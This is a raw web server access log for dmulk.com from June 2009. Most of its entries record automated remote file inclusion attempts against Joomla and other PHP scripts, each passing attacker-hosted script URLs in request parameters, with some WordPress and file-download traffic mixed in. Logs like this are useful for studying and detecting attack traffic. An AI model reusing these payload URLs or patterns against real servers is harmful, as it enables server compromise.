88.191.89.138 - - [21/Jun/2009:11:10:41 -0700] "GET /index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 200 20891 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:10:44 -0700] "GET /index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 200 20919 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:10:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:10:46 -0700] "GET /logs/access_080419.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:10:46 -0700] "GET /logs/access_090513.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:10:48 -0700] "GET /logs/access_090513.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:10:48 -0700] "GET /logs/access_080419.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:10:52 -0700] "GET /logs/access_080907.log///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:10:52 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 105056 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:10:53 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:10:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:11:00 -0700] "GET /index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:11:00 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:11:00 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:11:08 -0700] "GET /logs/access_090513.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:11:08 -0700] "GET /logs/access_080419.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:11:12 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:11:12 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:11:16 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:11:16 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:11:20 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:11:20 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:11:26 -0700] "GET /logs/access_080419.log//index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:11:26 -0700] "GET /logs/access_090513.log//index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:11:33 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:11:33 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:11:36 -0700] "GET /logs/access_080126.log///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:11:37 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 200 105056 "-" "Mozilla/5.0" "dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:11:37 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
82.194.87.219 - - [21/Jun/2009:11:11:40 -0700] "GET /logs//index.php?pag=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:11:42 -0700] "GET /logs/access_090415.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:11:42 -0700] "GET /logs/access_080901.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.200.195.130 - - [21/Jun/2009:11:11:47 -0700] "GET /logs/access_080318.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:11:52 -0700] "GET /logs/access_080126.log///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:11:52 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 200 21022 "-" "Mozilla/5.0" "dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:11:52 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 105056 "-" "Mozilla/5.0" "dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:11:52 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:11:52 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:12:06 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 21028 "-" "Mozilla/5.0" "dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:12:08 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:12:08 -0700] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:12:09 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
74.200.195.130 - - [21/Jun/2009:11:12:15 -0700] "GET /logs/access_080131.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:12:22 -0700] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:12:22 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:12:22 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:12:23 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20933 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:11:12:24 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:11:12:24 -0700] "GET /logs/access_081016.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:11:12:24 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:12:34 -0700] "GET /logs/access_081118.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:12:37 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20933 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:12:42 -0700] "GET /logs/access_090508.log%20%20/?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:11:12:42 -0700] "GET /logs/access_080707.log%20%20/?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:12:49 -0700] "GET /logs/access_081118.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.249 - - [21/Jun/2009:11:12:49 -0700] "GET /logs/access_081029.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:11:14:06 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:11:14:06 -0700] "GET /logs/?sourcedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.0" 200 105023 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:11:14:06 -0700] "GET /?sourcedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 200 21011 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:11:14:14 -0700] "GET /logs/access_090223.log/?sourcedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.194.87.219 - - [21/Jun/2009:11:14:21 -0700] "GET /logs//index.php?lang=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:14:24 -0700] "GET /logs/access_081009.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:14:34 -0700] "GET /logs/access_081118.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:14:50 -0700] "GET /logs/access_081009.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:14:55 -0700] "GET /logs/access_081118.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:18 -0700] "GET /logs/home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:18 -0700] "GET /home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:18 -0700] "GET /logs/access_090507.log/home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:20 -0700] "GET /home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:20 -0700] "GET /logs/access_090506.log%20%20/home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:20 -0700] "GET /logs/home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:20 -0700] "GET /logs/home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:20 -0700] "GET /logs/access_090506.log%20%20/home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:20 -0700] "GET /home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:15:37 -0700] "GET /logs/access_080907.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:47 -0700] "GET /logs/access_090516.log%20%20/home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:15:48 -0700] "GET /logs/access_090516.log%20%20/home.php?index=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:15:54 -0700] "GET /logs/access_080907.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:16:17 -0700] "GET /logs/access_080126.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
66.113.100.51 - - [21/Jun/2009:11:16:22 -0700] "GET /bikes/occcb/ebayisapi.dll.htm HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" "dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:16:28 -0700] "GET /logs/access_080126.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:16:29 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 105056 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:11:16:29 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:16:32 -0700] "GET /logs/access_090215.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:16:41 -0700] "GET /logs/access_090215.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:16:41 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 200 105056 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:16:42 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:16:42 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:16:44 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 21028 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:16:52 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:16:52 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:16:53 -0700] "GET /logs/access_081009.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:11:16:55 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 200 21022 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:02 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:02 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:02 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:18:03 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:07 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:07 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:07 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:18:09 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:17 -0700] "GET /index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 200 20919 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:20 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:18:21 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:23 -0700] "GET /index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 200 20919 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:25 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:25 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:18:29 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:18:29 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:18:29 -0700] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:18:34 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:18:34 -0700] "GET /logs/access_090521.log//index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:18:34 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:18:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.172.33.230 - - [21/Jun/2009:11:18:38 -0700] "GET /index.php?option=com_custompages&cpage=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 200 20919 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:18:47 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20922 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.89.138 - - [21/Jun/2009:11:18:48 -0700] "GET /index.php?option=com_custompages&cpage=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 200 20891 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:18:53 -0700] "GET /includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:18:53 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:18:56 -0700] "GET /includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:18:56 -0700] "GET /logs/access_080625.log//includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:18:56 -0700] "GET /logs/access_080525.log%20%20//includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:18:56 -0700] "GET /logs/access_080625.log%20%20//includes/messages.inc.php?include_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
